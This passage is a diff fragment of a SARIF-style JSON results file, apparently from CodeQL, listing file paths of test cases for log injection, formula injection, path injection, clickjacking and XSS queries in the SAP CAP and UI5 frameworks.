"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 98 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 99 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 100 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 101 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 102 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 104 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 105 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 107 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 109 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 110 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 111 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 112 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 113 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 115 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 116 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 117 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 118 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + 
"uriBaseId" : "%SRCROOT%", + "index" : 119 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 120 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 121 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 123 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uriBaseId" : "%SRCROOT%", + "index" : 124 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", + "uriBaseId" : "%SRCROOT%", + "index" : 125 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 126 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 127 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 128 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 129 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 130 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 131 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uriBaseId" : "%SRCROOT%", + 
"index" : 132 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 133 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 134 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 135 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 137 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 139 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 140 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 141 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 142 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 143 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 144 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 146 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 147 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 148 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 149 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 151 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 152 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 153 + } + 
}, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 156 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 157 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 158 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 160 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 161 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 162 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 164 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 165 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 167 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 168 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 169 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 170 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 173 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 174 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 177 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 178 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 180 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 181 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 182 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 183 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 185 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 186 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 187 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 189 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 190 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 191 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 193 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 194 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 195 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 196 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 198 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 199 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", + "uriBaseId" : "%SRCROOT%", + "index" : 200 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 201 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 202 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 203 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + 
"index" : 204 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 205 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 207 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 208 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 210 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 211 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 212 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 213 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 214 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 215 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 217 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 218 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 219 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 221 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 223 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 224 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 225 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 226 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 228 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 229 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 230 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 232 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 233 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 234 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : 
"%SRCROOT%", + "index" : 235 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 236 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 237 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", + "uriBaseId" : "%SRCROOT%", + "index" : 238 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 239 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 240 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", + "uriBaseId" : "%SRCROOT%", + "index" : 241 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 244 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 245 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", + "uriBaseId" : "%SRCROOT%", + "index" : 246 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", + "uriBaseId" : "%SRCROOT%", + "index" : 247 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 248 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 249 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 250 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", + "uriBaseId" : "%SRCROOT%", + "index" : 251 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 252 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 253 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", + "uriBaseId" : "%SRCROOT%", + "index" : 254 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 255 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 256 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", + "uriBaseId" : 
